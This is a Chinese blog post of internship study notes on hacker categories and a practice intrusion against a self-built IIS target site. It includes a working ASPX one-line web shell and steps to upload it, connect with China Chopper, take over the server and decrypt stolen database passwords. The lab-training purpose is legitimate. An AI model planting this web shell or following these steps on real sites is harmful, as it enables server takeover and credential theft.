金融信息安全实习第一天——HK与网络GJ
作者:互联网
1.HK的类型
白帽子创新者:设计新系统,打破常规,精研技术,勇于创新 ——追求更好的技术,没有更好,只有最好
灰帽子破解者:破解已有系统,发现问题/漏洞,突破极限/禁制,展现自我——计算机为人民服务
黑帽子破坏者:随意使用资源,恶意破坏,散播蠕虫病毒,商业间谍——人不为己,天诛地灭
(假)脚本小子:完全没有或者仅仅有一点点黑客技巧的人,利用他人所编辑的程序发起网络攻击,但是与真正地黑帽子黑客差距甚远
2.网络攻击的来源
3.网络威胁的形式
4.入侵三部曲
黑客入侵流程演练
1.前期需要现在windows上部署一个IIS web服务
安装IIS相关环境并利用IIS服务器发布靶站源代码
注意:如果.net环境安装不全可在CMD下输入:
"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable
如使用64位的windows系统需要应用程序池设置32位应用程序为true。
2.网络探查与端口扫描
准备工具:
端口扫描工具AdvancedPortScanner
局域网探查工具LanSee
3.Web扫描
准备工具:
网站后台扫描工具御剑
网站漏洞扫描工具AWVS
利用target finder功能扫描一个IP地址是否提供web服务,是否开启80、443等端口。
利用web scanner功能扫描一个网站(自己搭建的靶站)
利用site crawler功能爬取网站的文件和目录
4.漏洞利用
过程:
先进行网络后台绕过,然后篡改页面内容
5.上传
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。
标签:文件,IIS,web,信息安全,扫描,HK,工具,上传,GJ 来源: https://blog.csdn.net/qq929968354/article/details/116483031